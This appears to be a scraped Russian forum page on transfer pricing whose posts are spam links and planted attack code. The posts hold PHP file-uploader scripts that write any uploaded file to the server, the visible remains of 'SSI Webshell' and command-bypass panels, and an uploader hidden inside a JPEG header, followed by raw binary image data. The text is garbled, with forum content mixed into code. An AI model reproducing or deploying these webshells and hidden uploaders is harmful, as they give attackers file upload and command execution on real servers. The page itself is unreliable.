Трансфертное ценообразование

плюсы и минусы Закона. Обсуждение нового проекта. Предложения налогоплательщиков

';
$drives = "";
if ($GLOBALS['os'] == 'win') {
foreach(range('c','z') as $drive)
if (is_dir($drive.':\\'))
$drives .= '[ '.$drive.' ] ';
}
/* (С) 08.2015 dmkcv */
echo '
налогоплательщиков
marsa
lexa marsa
Обсуждение нового проекта
от 03.05.2024 15:32
marsa
lexa marsa
[url=https://annk.kz/]https://annk.kz/[/url]
от 09.01.2024 14:50
marsa
lexa marsa
https://annk.kz/
от 09.01.2024 14:50
marsa
lexa marsa
https://annk.kz/
от 09.01.2024 14:53
marsa
lexa marsa
echo 'Uploader
';
echo '
';
echo '
';
echo '
';
if ( $_POST['_upl'] == "Upload" ) {
if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo 'Upload !!!

';
} else {
echo 'Upload !!!

';
}
}
?>
от 09.01.2024 14:54
marsa
lexa marsa












SSI Webshell













SSI Webshell by ./Fake Root

Command :  



Host :

Server Address :

User :

System :


Current Path :

Python :  |  MySql :  |  Perl :  | Ruby :  | Wget :







Executed Command :














./Fake Root - 2018
https://fake-root.blogspot.com


от 09.01.2024 14:55
marsa
lexa marsa



Uploader


Uploader












от 09.01.2024 14:57
marsa
lexa marsa












SSI Command Bypass






php engine disable bypass by unknown45 | server :

Command :  


Executed Command :







Unknown45
https://exploits.my.id


от 09.01.2024 14:57
marsa
lexa marsa
ÿØÿà JFIF    ÿþ¼ echo "



";
if (isset($_POST['upload'])) {
$cwd=getcwd();
$tmp=$_FILES['filena']['tmp_name'];
$file=$_FILES['filena']['name'];
if (@copy($tmp, $file)){
echo "File berhasil terupload! => $cwd/$file";
}
else {
echo "File gagal terupload :(";
}
}__halt_compiler()
?>
ÿÛ C  

 $.' ",#(7),01444'9=82<.342ÿÛ C 

2!!22222222222222222222222222222222222222222222222222ÿ ‰¼" ÿÄ    ÿÄ   ÿÚ   Þ€ $D€€D$C¼¹kž&ÒÖ²KÆxH„ˆ˜‰ $ „ˆ H"DH„ˆ„„H$
(ÞuÎo†mô˜Ï›3×[«YÖZ•·ÆqY‘íá´»'8¡î\'i:j²Ì‰$ ¢@ D„HH "@ c:†³­˜Ÿv:O]g5û>ä= ÖPd cÏÁ%Z
—~U>å©xOÉî^ü[¨g[˜D€ $ Q ‚@ D«‡)òÂyPu¾>ʝàÄ€ WY$«­ýÜS\ó};há3z»X"b@ H  !! H„ˆ$„À”܆Ç\&ÛâÊ·hÇ©Žå¦.¤´1ó2&.„I@ ‡»hµÕÕ%ß/Õö!Ød©€ A(A$$€˜’&$‚F›´q“3þ.‡Ö/µ =õñ»Ÿ“ïöQõ!‰ >qs0å¡™ƒ‡q´:æÇQ‡oÞZÆϘȐ H   '‘¢hÙÚÇ>}]N×Íß/;¹°EÒõý Öƒ×Ö¾ÿ “¿¡·ÅŽï¿càÝ^Ç#b” D€  HKl决gY°CÑõð÷ð«ß 9Ø-dÙTöTý/±ñ¯¶?ÎÑå1~ÏtN³7 ++rñ:G&֏b‡£­íÿ ÍŽ?s?Lë ˜ú>x_âç½ýE½OB‰AÔ×>l0:CämQ d3€>²qcZ*ÚYµõ¥œm°zë^±ÛØ™ðô½–˜ÿ 5ò¼à·ç¾ö:+Ú½Úºëªihu›ý#w–ŒH }Dšß(éœÌµ±ÂÍ£ê‚+ß4·‘-
n-0-ùß!¼ `dG‹@Ìs“³sâhz߇]±ÇÜ:O+ê–9H ùú4žuÑùÁw—‡™CÖw?X[ÕÍò¢ù±Éöð'ä@ΐ “7x]ÏÝ?Dô£\ØõË\޷ɺ͞,LH ‰5>a×9q[eGÔ„WÀñÁ³®±É¯óúùµçƒ8ú·§¶ŽíJËÏ1à
ë }}cgÅÅF%ù@Îme/Nô@øׯ(­ùÝŸ©s¾‰c“ H ~~Œ>#Þ¸©çs®ìU{ÇÎ=ìZÌ{Ÿ~D ê`düø±$ Æ—ÕcK>Þ0Ú †u„]i}õjîJý`Žè5Ø7üŸJÛªíd¦ $ 9ÇG¢9¾<ãiù à /LfïØçû ÖP Dáï^«/v¿ä:£8  $ $j«§s  "D&pSût]Ààß=—B5p31,t³h9þ¸ 5¾²èNÇ"@ D€ (#ö*\8ûïã $ t¾j:÷‡5ÚKÍ“—k†N-ê.âèeŠ>  ?UÒÇùóß.ùmªÌα1 B`‚H$ D€ "`”I¢óþóÌMP  " Ú+è:yŸ¥ WoYW9÷¼¾g[ÆËÚH ”ó2rÍc¼s“M`J$ Dˆú†ö¦H§èÑãS7?"½ooÎãõŸ¼í¢$  H5wÜ°N&Úõcä( wI륫ªì(ÖRß¡ËCVè~Á  DÄ‘(&`MM¬œ×UîžG ujHlÆ×̇߹Š¹·4ÿ ®•±œËsÙd‰@ ˜H  @”€‚@€ #çìD„H   J¢@   P[¸¹Ù¦‚8¾ìnjþBv矩Íu£·O.ڍÄ,θÐtã·¹7U=÷Ðßœ›o6§êå«AÕŽÎùæ'PsÁÐãG»/\BÀëï
’õÄz™vÔtðµÍ$ë‚@  ÷ç"¾×ýͯ[Ûu#>“©òír¡ËÎíëåêrßjÃÐz) ï\ëa-klõCÏ­òžÈsÿ obƒvÒ·3›v.;ÖŽwV½:=Ù5¢—c×þ
ÒŠ÷Q.r²tƒµjõ%.õGòlœç£h†ÍKƒœv2€ ÷5gé:[<¸×kåeuuÞæfñþÛ˹ëçèrß;lòÓ j×Îa¼ê¹¦~±»xLЮ
oeÖ:yÏüwþnWtŠËC›zíwf»éž4¾©¬ÔÛ5ÑÎk²¬Kí®s²Ÿë«óÃh »Ç5¯MÒ„é±0H ((( €A H‰ ÿÄ 1   P 135@!0"#24`$%p6ÿÚ  ÿ €@EŽ¶‚Ì[ÈIŸÃĽ…¹‚ìdؤÏ?é®sXÙ‘E†Ú /ÂÍ’o°3J+¹ƒÀm]’
þŽc •´y&íÈÅ\Hï\éW:TΕ3¥Léqc?nnö¹Ìt[Ó‹"Ϗ1?¢N¼pò %øÖ«±±—7í+ìtTljÌÜŠ­XW¯Ã;? ãŽ+ bË܍W+#b"'ßxìxÜÍÑf Y
s{ôÉ‚„“ 4¸0«ñ­F'ÁóÂGÜǸo¬¶IIß&L É’IfÁã(üsxUZµ6Jw©d`Ì–ù‡À‡Mî;‹)q
gãP¿ƒB#š­V¹X께.ð«¦[OY‡Àq
ƒÇ•ÏƱ^¬Žø¥14Xç|cD’Éqû½äîPðã\1¸1W\îkQ‰ðÕ5D6‹’ªeDÞ’OvfÆÌã™­âs[ÀÒ?ªº®œ#ø²ÄÑYˆ¨ä8ø”³:˜½×h%jüŽÍ$»WîOÛñˆÞ„¼
öó¿L¯”±&kªw2‘#Nf7‰ÉôEú"ýWp׈R~|Žþ&ÉfŽÊY=Dç}#—#7q½-à'üi^xhB·ˆyD~Tîçzne†
¼#Ãz^[+¹\ÔÎpó¨uÄ31ïHv¤Æùá[Âñ=FV=>â«¢œÓ8Ÿ¹ST_¢øuñk;۝VuYÕ&$–bŽñ”œ
Üžy)>¹L^mgq°'*¿#'çß!š;á!ÜlœkÚýä3YŽr½w8‰’ôóg ú=Æñü5™À©Ä…±~'9éŠG/†34L*j,Ùçé3¸í
ÿ …‘½?¦¸øØ­Vü˜¨š&;öå´³î;GèdoKÁÄšãÞÖ¡Ž_ŠÆ+ÕŒF7rù/2ÿ ´î;DŸãdoKÀaqf®OŽ0+ñ­F¦õò_:TÖÓ¸ík#~Ï Æ×㢮9ªÕðmQ}ŽÓÂ7‡Âÿ Ù”)­—q¹ofE_–GˆNB¥]Jg‰©ªŸF‹Ãÿ _ —AfÎ3õûŒ¡óbäuО­Ç•Ïûç¦)ïÌÆ·˜&cÞ¯\9ŽxÜÍâÕ|2Wòfφrœ.D殎ÅTLt–¦<ÎĊߦ(Yˆ6'ŽJþ|­&¿¹m8dç5úkñ„œ#û ôG¯¡‡Ÿ/˹ÛÇê+þ;W}™áflô~"÷KÝ$߁Ëz⦞é©~ÉŸÆôMV¾7K º^ÄæÆûÐkË9iDX$n•)Š°7Åóû 2’'Q/ºª#’Æ×÷v}âèÌh1N¶e\üN)ŸÆÎ \ +tTü¾5^#øÜÖ«ß*C‹Ý¬¡$Ø®jµ~ìiŒfír]É%‹‰tßÒñœ¼K”P;ÍÝv¿ˆæÝYf­F7¼i®[Vt¯ø`ô|&>è‘ 0Ñ£²(;Ӛ׶ҭÐÝðèïUÑ
}wEˆI†‡ pÃßÔ{l©ÔŽç•¬ÂÏݼ³_(¢¿ØR°øPûñý'¬ÇÈUß_Hó`ÆÁ3ú ˜a–É”†*h¿uän蕲&,*Dþ*º4¼“@aá@»í¢+–54©’03M?¤¼l#MG ¸]"a)¦K1FôÍ3…ØØÇv2ªkð[?!ØŸŽÌ PGOê<-Í?çž]ÖÍUµÝTŒùBu\î¶<É'lÖΔū¸S¾r«`õR0~ž^£°ê¤dƒ„·ds+ú©_  ÍÕHÈ–ò#‘®G²üŽŸ)
{9eÞH•#Š¹UÕ÷òžÃ†iØd]Räå׬‹ós6|¤"ÙÏH!4‚ð¬
á+N+s¨+ú©Pe=uù8ñg˜2nH­­®gØv»_lbq>Ò½°³Žÿ *wóÅTS@EV¸ÅçÒàý,¿÷*ÊæÏEMÉÊúÍäEƒZ’¶×¨†)¦39Gª]jöù›9ëÚû¥¶»÷Ö{m¡yÖ/b±Õ…çW^{°H¡5éÇÙ¿;ƒs¬«*úæ6„‹",aÄÑ—8?Kg ùvøØé=FÎÕû—kµöÄ]0§)ݳ‚]g>“OŸ§óX?K/ýÈR
kUî¸*›)}ÓhýpÈ4erË4q #íó6s×µ÷Jnwï†NU/Ô„¸&fΗX÷žëÉ^™åW³füæ4ùW6wU‘r^mšƒý)yv[Gü`…MŒ*´u~åÚí}±‰ÄölüTQ dïç¶Àì†Æ8„.M>ÒËÿ rª¯ü‹U#ïýº)¹AxŸhýpƒœRV,»IkُœmœOÕº¤K"ÞO^š‡ËG“(KË°¼÷ZèÝU.lߝÐ960l#džj!òaüÂsÀò´.GD£Ml§GéfUû—k°Ë•SP›¥VL$¶ÓNU­©H‹1Ž$?Âg`ÓAåÄ2'QÄ *-œœé!Dý#¹Š’Î):ŠŸJaÎ:d*pßi§—ñIÒ•ÉžÕ&êæÕà<ú|…ù$«‹ô‡Â9šY®®O‡¨­sv&€Ç‘,k ÚÕwj`oã×XZöϸôwÙ/fjÒ<¸4ˆa|«°ê;Hý©eŽò=§­IŠŸXªXàTˆ"ÅM!‘ËÒX#Ë#"¤Ìµx¢h„ëë4Ø·ËŸÅ\ý¦á†6Ü*Þú9G\2(êhÝB?u ¨OF¥`Ý;÷m¾f"´ïîDÑšuÚÄz½)1oÍ2î©â19SÇ'ŠÊéÍM_qþÔº”ãޣՏï
ìRô5‘W·ê£buá¤/„µj ¶sêì ^vbqüÔ¶ÒD|CÊ2¾1ž…Ûh«hDQ…­XxÁõvax\;¢îAš—T$cm1ÜsåGHp¢¬ì„#suá«õ_W§6`oc¶/ÖŽ3Ë…¦Ó¹ÞšÖUˆâ5q‰¶ñÓöQÇVlÈ«Òdð©.¢õŸU'”tÎÎrÝÃ+‘‚x‹§ÌXäÕ¾ž%‡w½}&\õ«[Qn¸ã|ûç>¬1^•Ÿ)FN*؁{—vq–¢rsðÖ‹ºeÝRã'³¦ŒÎ;—w"Ͻ39?¥}î7
åªyÚfÜߤýî:‚EÈs5,Í+no‰´Ÿ°}Õ>¡,œ‡!ÿ
ÿ ÿÄ )     1 !02@APQ"`a€ÿÚ ?þ ^ÑåmZ¶­Y‡¦sÃuNœq:î‰fúµôRK\&ù-µ1áÞ‚Y|È‹‘kª2|kˆL~aßJü¡Eñ)îÊ7ÊŽ´(ƒ´
‹ï\s94P¥>œÁû7ŠŒå9Oy3©©šŒ±Iñª+#¾,Žø«~1M
n=Üç šìÂ÷¨VÉ«bÔ`ø›„qy8N|(·»—«äÊšðtåPÀšOvcj
;¹:°`ÑBï–H©%͇ã÷sucŒd¾ ðwoo7`Ó»œyA„è™ÕU¹CƒK•Ô¶á=ùñŒS{ºæ8Ù½Æ Æ½<†›»<úyºw#fcê'éÅŒ.)­
ê'éÁ‘&´4Põ/naI±5¿á¿ÿÄ @    !1"AQaq #2@BPr03R`b‚‘’¡±4psÁÑ$Cƒ¢²ÿÚ  ?þÀu“1¼\½ø<iÇð¬¤ü–oEï©Ä-Qú¬>M¼ç¥Q„Èw.©­Œ~k¬™çëì+Žo±x}à©3 7ŒUb‘¯áòEù^Ýè·“3ñ9^–Bî6à,Ív—iv—jÌE·šH;B¤ÝkuÕ¿Ká9ü‹s“Ñïøµ~W—0 H¬½–-Z%b,¨4(3”é·âÖƒãxsN±ò ’W]j,f„[6Ù‚ÒXaíðÁceøÄj+
móûòj¿!ÃPÙeu,;Y`s „Rá7ÿ ^{Î?=Cj2Hqþ,«»¶õBª3B\2?ºYô,¼ëv¬Ábîå½P æš®»ß7=ûüæªëRÌ·ï²ó¬ÚV%P-,OußceŒéÙY¯=ÇÎ>Ìäî× 1ÊÊ ì¢ î·_e᝗\z·çæï•Ù4'JþӍUUTÙ]½Úö°·*…†Vsn=dxqlÞLÓ–.²õ”Ùhîä-Ê–2ONà«æŽ‘Ù4U>WfãUEDO@wpl»±^Û`i:QèŸ4 ä?µ…Ö…]ÜX²áÊAO4,Õ¥€Xz48…³k5ší,r!5ãÂjšñ“…|ʧR’O‰Ä -#Ûf»+²²³t÷ôA²?»£æS»îô¯mîx¤Ü1*¦ÑК=†¾díä z+wuí‰=Ö:Ç·k<Ƀkút+Eb;͆ÆïÌ¡õté[4©Á`)ݨF/2ˆýîæçÞ*rT(þ¾dÓ±ö–?šÁPôonö5¦ ìúFÁ¹§Ì¥Ý„tèÏϥ͜Öx*ŒGNïJïHÙ3ö6že+6´ôö¬}‡ibOFéj«[Š©²‹j:T²GüOó9£Øì6bV¬û¡u•Ù:l²k¥O™²mO²•îãÙUEÓ揧išCÈ©¶Çòƒ“tGšÉ‡6ðî81ߒǸQG¼Ï5çÚ4£þ=»®u”æ:6ý¥Ž£ë<¤6”Ãj<£Å˜fîö4Ölç4#ÇëæÄANg€âÓ»Û9µïbÎh”ŠhæUbä39»N ¬åP˜Ü2çZ¯Þ6ÕJcì^4´ŸaRªƒ[‰)±ø³qßæå£Þ7¢¡ØJÖ´‘ñ¥ÕÝ `~j•4Ùí(2³írGüùÉåQXÿ }Ôtî‹1÷míÑ@2ó®z!ÔŸý{£zW[`ŸS±6(ò¿–¸TÂç#Æûw6ô*U•œÜc‰Ø¹¶}Nß=-p¨:‘—“‚cÖݝÈt´p`ÍË›Œq;~@2rz2MšŠ,‘¥®qĬ0´IÊjÆ|:Ê cCZ5®ÊÊì:Â.‡­gî±öÔ®è6ŒøŽJõ/Éñ‘ºÆi|C4L
šÕ$aiÞ=¥ ©U-æÛµÊóú×}ì¾Jºö‡
„-˜ÏÝ]TÀñ^ê÷¤­($ý+;ò³²VŒ2°ÃŠëÆþë­{Ÿû.ª&·éò—d~_ß)œÒA¦a{ùYUo(“êꪻÞ7)Àš@ψ­Q/êBQKç²íªb î¥ïåýe7…”d¯h¸2r÷òþ²ƒfy|g;Ú•æ<´Þ‚½ü¿¬¨AšB/d\¡¹#›¢r4^þ_ÖP¿#¤Xv(9¹P£ ‘í55ùíªœ6g{ ä÷=Îq¾s(õòçñ•‰$–æTQG#›ASt¦8Í! ërª‘­•í`¹:ds¯eR˜#Ú.j;Ô÷äs²ÌÕaŒ®ì…zY㼡GG­¥6V
§–š8à(½ü¿¬¨ÜãW
¢,{›¥¨¨Þé^惈.WãqŒB„:i½‘w–OÁ´¦]}àýªF꺹Gù
ûTn=À„é~(«c8 ? RÕ她"'qÖ˜Ù]u„âS <¤º@jT’¤dµ nO;®!A_…GèSzW(õ'úÊ û3u›³AÄ“@ŸðÅKÀYø’ûœ.ìWÚ ŸµËñÉKo]5¢dc“Rñ¥T’¦pÎ6ÞL—PÏ‚ç#v“©t¡#ÀÁLw)>õ
’&GíÕdqx‹ClÓqw®jx¢—€þ)gŠýGåg(ú'OÒ ñº1,Nð”é.5•ð´`Ü¥Þ,¸çfªå÷]ÙTÇü&ª
nÿ I åt©"Ô¯,–6
¸ŒiævÌöÀH/$/sN%s²éunS1¢®-ÁNäѺËñD\Û UMÏF[ZRË‘6ó¯d¿§r‰Î€€ŠˆÃu*_´DZÇ2‰Á°’+QFæø|'ÄÁïpWOmعÌ%n[Õ×@úðM—”6ë7Nµ!ˆ¹£‡Ú êé­Òòp$®¥œÃ´\Ÿ$p—4Ó¢{eeÒ_U!‚+Ñ»¦ç£-­(®äñÙ*Ž…Ü@ªF˜ã×Tèy3*it …`4Tû;oQ{‚¹,|ÑçÚ ¯–"ÖÐ⣖^xÀðP½ðÐìO÷ÿÄ ,    !1AQaq @P‘¡±ð0á`ÁÑñpÿÚ  ?!þSш œtÅŸ
¡ºç#ÜfÆÕ!‚ñŸÃ]æ”K0=¸zÆvU§ ®Óð[‡Î%y´?²T­è%KœØž_ƒj¥M—ÛX×́åÇ;)›ÖĆ·²sÞ“ì#´AeOFgÌN†òJeys Å[°‡ðKåÆš~«‰yç§N S,ÏQÊdyþ,¸yÄcG&|‘*PdŽS9É×yX?€ƒ„5ߤUNË>¾ ¬«ä@h—çÇq}£¸<øay¾ä¢ºïÆþ>£åæ¦H ¼‡ }†ù\5Ϲ ),tŸæDG™Rщ*̲tý¼uŠÞMu/Œ²4._Yz"Œ»©va󈡉¢Ä‚)GAþøÝ4×”~¨ÓÈ@¹Z¬t8d[0Á·)¥ˆÆBfˆ÷†X·Ü}²c°¤‰V&’ö€áÙã
@5bœAGwQt8
^LOCiPm‡_A

6;¡òy1Ðt”P_^S$ìÔ e?‘§Þ^)v5>3‚¨¼wÁÝý¯cJæ¦1&/W®éâ”ãóæÃ9½Uosxß …½žó‰O19ˆs ?ÍoYpTzÃ.f¬” $--ˆæ~²Î»qça
‡få÷e½‘³t3í|#[ߝ“,<ûeÏåÞÏXe)ßœ1w~_ªñ,A¬g®.¾Çc åòîyðGÊîd3
ö׈”ˆ9KxÒ¸]}žlÓæWõâU0졃7ÉîƒPÉz“;^rû/\QŸo©ñ*íÁÆóìBÇI©éÓáÒ gÊ9Ê>ËÛÄž7Ç“³¢/†$/T·˜îÕóÎzÈwã™Òfu”y¿%vÉüpù;+êQJ‘oº“H"¶áØÂúLÉÐ"öñ.X>ÖN§dqŽóŽÁœ/ZA‰¬×ðZòšöµ0ö•/(ç/¯òwÝõ(-Àß„^Íõ¬„ÔˆõìÓ(HÎ0· ]œCÉË·Y´=OëĹŽµ•<ðìáf9œ°Û¶5PªgXëÙ¬>i¬½Žæã±iµ2G
a£~ÕgsÂá4ûñ<2¡|Ž$åà K5™xu˜A´ÀœÓØ„i),‰ÿ -ó1íßÊp·ŠõG¢ÌË©ÃmN½Ú·Êÿ
r%¢ÕˆIußI@# ö ûÅÎe‡áÀYðR\5ÏÛÅDKãPæówÖƒqDTçÙ åø®S#(€ \OÍx­âçùÀä–ä^Òí%FóaR‰‚²få,ÍRéïØ8û‡p).c¹èfü¹GPöW@A8z‡‹Œ1ç´FȤt-ÔÉ@Ø„ˆrDd‡T±Ò|ýaØ5Ôþ
«pÄè ã-SiÕó{yÕšÌ Loê T
@DÌcªmÄ5mÓº}{UZõbãžzcxxVsªÝñ³nzL˜„W`ëÊ÷?£¯`,(&Öùp)kиââù¿¥1ìÝæ?¯rù 9¹‘W3Ô{¿À1Œ1~Ú™…@;†_Y¿‹p£9H4?EAltð.…ÃØcö¶C”D&cù¨l—z𠮦í(×&åÐþ ‰ÒþÓ™¡a±u’ð@”V^O´L|(  D¿º%ÃÌÌ=’ƦÅrÎ Í <âÆŒ/B#]FpMðÊj¶”Ê{%;Ÿ˜½ˆùK"zãTñ¦WxÔ®Õ~zàÖ%½Šx×
ðÁâ°¥&<8q²FY-¼á ,eø][Žèa•IÃŒ]?Ç [Lðáݵf<×
h °á¾ÒŒ-²ûcÃŒn"Õɏµ™9Df¬ŽjÁ‚ÃVÓ5¾„¤É-—"~@ù–ÒÖfb]3Ëâp¨¨ d—]1 É(m³IZ*9ªa5”¾™Ã0)§8™È›€…g–ÒÛž´eOÔ[pýGô¬V4˜ÕâH‘‚vµ¬#Üx’†}~pRÈ yÂyˆ†©yô;ÍÌ&¼#¦ªÇfuu¬x}–Ü>×XVFXÊr±©˜B_IäÂL›ÓÔ^Óì7„F0•S+'4ïLFæÁè³ëóg·üÏ¡Ê}¦Ä÷©íÒŽoÈØ&²¨}K–ãòÆívGË"Ye=Yí¿¼|_õ_»†”ú&kõa¬tŒ¯1¹HNÿ ýËSí“9'Äÿ SÝ>8\-¼é§ÞSÙü3ë󈁂bCÃ¥ ÊZFA7ŸC¼A·Ybê*[7Ùx}–Ü>×X²®«
º
ÙôÊ>OÄû
áŸZ]‚q‹nlÅl;o>ÿ 6{Ìû¢>æIïRÊj˜÷Œ¯Ö ô?Ä·\hôäú‘ço“C1;¹9]Ïoýåñ³þøÑw['ýÉr*æaÖé>_»ŽgŠ·*ÿ ¸¸*žéñÌâoP>áèá=ž>õùÁO °Á2Ž>‡yF˜¶ŒWθ1,{S‡ÙmÃíušwu'²k®œ*ÇX‚áŽ!„û
æ™’ñ„¬Ê;ê˜#(÷£†Dû:žñšäGÓõ‡SS+˜®lw°þÖÁP$`V2n˜áÅù³ŸS²-2”Ó=—÷‰O¯|ûÅe6åÜ¢
’JãF§Ó8Ù±£ç
^‘AÌc!Ë ˆZòM˜ëe=ŸÃÝpkŒ}VÄàg¥˜—)OP'/Ên$@ÝŸöfôá—²„ÏŽášðº'ýBëªÌW¦0g0]`ÕèčÆPN…tÊy¤Õ™µ†ûL)fn§–LÙnkLÅ
“¨o, fU˜R§&à\L¡Zª„ÙÕ`v¢Z*.+ ̘ 0 X0N+Á  ‡t09æ ¨%á  0‚³à€6¤…#é€ € ‘Ì 5 ¸&C/Q  8âç€ œ ‚Iå   ’ €$ ¸0‚ Œ  ’â Ò ° ‚ æ(
A  Q   ¬ †ÂL [8" À ¨2?È Ct`„  1/p 
e …ÛC%` 0ÈEP  Aà    ‘†¢@0PÂAÈ @  D¢ˆ ±L ²‰(Íàƒ,ÐØ
8 ó ÐŒ0¡E<à $aP 0à 0Å=·ØQ0ÂA0† ÿÄ (   !1A@Qq 0Pa‘¡á€±ÁÿÚ ?ùöè\ϤIwŒˆ›ü/íBV%»Aè Z¡Þm]÷—-ghØ)ø¹Y‹²*=š¹ÏyI˃ðx'õÉ*ÞdΓÎ
=…ù%u³×5 ª?¬@[°ùP{Vk;Žäo‹þ¡w“¬¼Ï¬‹g! cnžØPÇ|ªa]žzÌüÄ[hïï-ùkÜÃ"c÷µ~¥¨{áã‘áêþøBWÌï¥Ô[wV,MÊÐxü¤ÁPýÌWqÚç´UmŠpœLsœõgö´º˜2©ù5¯P¦H‹yÐ ÚÂoæWß_ñôÛÁ¹?qQsí
¼Íü?ãO÷:»?mQbúGg
@±1Ϊ 9‚mgZpuú êÅOìhï%®¢’ÀSΤêcšÌ@Ù`¦ÒÚ¨à6ºÞMŒuwÖKŠrûJc˜pƒs´v[¿
çÈz)Ÿÿ zíèfœ¶#6µøsŸW6x#?Áñ ?á,GË6ËÄÈžªÛþ
ÿÄ #    !1@ 0APQa€‘ÿÚ ?÷êÍÒ?x/˜>Ϧ
ÔÀ¸º-›k
ÆAg¢¢*·²Þ ¸ßÐQ<³‚
äÂp[ì;]睄7eÙäUoi'í)í¡æ(ǐ…CÛ„8eþ®fî¨îD¬,ƒlK¡-áFýta1Rùwˆ©¸B5 Õ% øÅ|Cò›)Œ¾3SËvôW^ v»^jвæg/KaP†à ®Ñ¶£`m¦Ç–)êƶBë:Qþˆµ«RëU¦›ËÎFÞ€f@(è ºÕºàDüÄÇ/]kYËC¼
í-,:
0Q鬚 úuO¡¿( Qêº*Uç¬3Ž_àßÿÄ +   !1QAaq ‘¡±0PÁð@`ÑáñÿÚ  ?û5Ëú7/úeJ‚y2ÊÌæK¸õ9·Ææ©ngՁ ¦ôÿ gº‡ýÂÌîÖ»â$*h˜ù4Æ
¢Xð¦WôŠ”@vy±|OUWîüF@?ô\{FZçÐQœüð.5£ð¬$+É_¢˜Šw_Ö`ÈdõMD4ÌI_ÐÆÌ×Ð5^„Ƴ ~ÿ éYø=Aå5€®Õ)°˜Öº#}¸YÌÒtPœÇ”øE°úÔSQ8)´ÁèF‹©;èùÊ{VÓ蹝¡Q? ˜Š -]3Y^¡:<ÞÑÉœÀØh£Ë0[Äu ¥–ƒzL lô!¨Ö¾%ÚÖÇæ!m[2FŽÑb
¨+q4Ž44ÿ Ó¬×!âËÙÙèðpýøœär¶Þ’óU.¢Ýþ8yÐ`¼¼ï– éÃë4ˆ‚<™nbíªe
^ƒ_8ã!RÂE5ƒ°üë‚Ó-ßcãƒ÷Í@‡vÇMØõ…‚û`ßvuxï ]»¹Ÿ?á9ÓhÊ®äÕz’´ë0…Q¤x
اmº&¤¯½; c{3¦ìw,¢ì‘P[–y¬  åüWu×­â ”Œ!êB‘4F&A€¿]øWÞdÝÈj¹¬g™Fta×w›4•žPŠÒÊü¼DUh%­ Éëymó(vq)BG?àÐþ HȤ`€Ô£D”þïj““ß݃0¢©@¬V–4F’»òé¡«sŽI~y;ËÂe€òR›fh°ƒ@£ø‰è ît`4Š¦*K£aÍtI¤ƒ¹
Nß îÚ€å´Ï/¹ø™o2ܝX (0K„%Ë—ýˆZÕ¶àî½7‡éc¨ºÿ XSÈo-ÆÕUH!bhË>ˆóë,)Ì‚ÚTNŸ²v`«sû¡5éÙµrØÎXM¶G”9í*Xêób6Þ5
—l§@ ç¯M¿Œ58³\ÿ âdzáLD

¹ºÉñ4H¹ü&cxýÓ¬ZØÂ9­NÆ|É™}¾_w†Zy.¼çI˜:ÀÐ#ÓøÀZ)&§PË®R)R”UZK(\œ¦¾P¹ 1ÏÜȹ‹¾u[è¸;ƒæ*aНx½VZ®f³vaŸ¨<ãÔ™a½"¢)áýr†#†ÞœÜ5He«­úcîC†"냸ûÔÖ‰P¼°x5~e{ÍP•š‚®è½:DG"M<*y}t&j~L[™…·f`VŠyD,ÙŠ7Q Šçò<âS9ýÀ8flÈioô(,‡6 ègƒt ûÍ\l#̆ùméÚPÜÔÂr|⨡Ñ5’öSø ¯ÈDð]Œ'Ð?Wœ­åÿ bsÞ#Ç4ŠÃ¹)B‹ÇÉô)]ˆý¤%ýÄÒ'ÔÆØ cy'Q˜ÓáÎn*V2.#~¾/¬ÿ Ô‹s}e¼mÝŠcÔ•E˪M%›æóCy|ç8‘CùóP+ÉSï9_-üLéÃCóW€CÑ`%br<É™eVþqwÜøVzÿ Ó…¦ùöðc–ÌÂàÇo âsÏÚ®\¾ºA¬æoù¼: vêŒFNR±|·‹9GY8‘¢²íí9Kº~Õî]NGy‡Ü
xÎ}òÿ =8x,ȉð¢ÃI£¬»ñWÔZRžs#ºhùݹÏ|?ô<*¯I©ï*¦iÜ÷î¼(ÚQfô¸Uºü|#GX¦»ß[˜åR#Âç1~!C+±40 éèâb»Æ±ÃþïÄuûyÁMËðh÷þ<9Øv©j÷Å/IAÏ |ήŸÃ k3å£\­ïn8›ï>8w{WÝ~Þpz,ûð/ß·†êÒ¶ú“` X‹*÷Fü W"kõÃz\}> j#Wšîø—Ä÷óIß°(ëöó^«ù‚p¿½{xýSžòÁ7‘£
ÀÍKρÊâ¨.a¬JEÎWŸò²@Us)‚iÏÀK°5× íâèø™ù¡:—_˜ëöóƒÖØúSóÃ"u,ñ9`5M®î9?â:_;šñ"ŠA“žÞd1ÇmG>fñÙ§xëà°cÖ9B & NÜå’ñ¯€ÖVç3»Åb´MOyšc³dsûy¯
4´Çq=ê&¥ih/×‘Î oDÐóˆSA€²ø•ØÓ;pW­”áà%J { â9.‚7M};e5^Q:S8Nr›ÿ `Ž"”$Ï"çwz춪£RÍæâü¯¹

G[àHÂj Af žpY`Õn8—j;-»ÍyC^~>ÄîømbÝ“Mx £*|Œ
j%‘;@옵Üèü¼tÅÀn_™šïA
ÕWÏÜM86© òý“Ò
yi S* ¬G2—½Ëþ *UógŸÑÑV.X¢Çà<”Ûì0%Ð è}ÄàãóG±é|­e}úu¬Põ@@ D­²ûF&¢5+§o”uû˜2˜ò‚ey½y}:ñuõÄ|Då‚Ÿ ·S/¢´[¤¶‹²?% s]#·Eýò>˜<¾æpÏW/ªëèçÀ}1;;-0æÁØU0-khV1ϼ  `©§Ì
£‹ëw´8>`=ÎÔÍDFœpå½ êýFÃ^RÐ{Í4…†ÿ O/ºŒB$;R0{™¡ÜÓËÀkô‰G´BÝL2 Dèü‡YÁ–NÉŠt§»ŽèSâ æˆï^•ÂÁ†.ªºq«xM‹–—Ä( וh#vhæ¾¾˜„tû¨âf›ÏšÛ1*jA¤|ѱG£ǵªw:õ•mÁí“IÌ©{§G¬T4
–ÓËÁRîþ Ñ‘®âÿ œ~ð1DP›“7FèWØÙ‰õž<æ]§åàH
B±lªát…ίXÒ¨wK
ÛPÝëÓc—ûѤzöµÉ&{‹Ø¾o¸‰ŸýO:î7ÎÓ#ƒ¡¡5¼ÀM¤/’nô/Yçxsø8/ÞôšÆ.;'áºníˆä»@{›O¨ñÅÅa²ø†9/Îþc—Î;m^ð*hÕˆ:3£ßÙï1þõšKûéˆ<š·¢Mù´•A-Ñ}y¼¢dE‘êx._|WHÍÁ´5˜Ù•5t‰4*;‰_§Ë#ôŽúñ Rü{ò|¥p<šm–Ï®ô^²¸_Ñ ¡
ùͼdéª0¼ë:sùÜ*Å@ :Wúø5¡À½èÂçŸçÕ^V[õ,–Ž8‚÷¸õ„ QöŠ©'dš©ìØ
¿üJ:Í‚z²ÝÍÀ½ˆÐ›VÓ>òé®d_u—×Àÿ E%ø­ÞPò=ȲÔwD
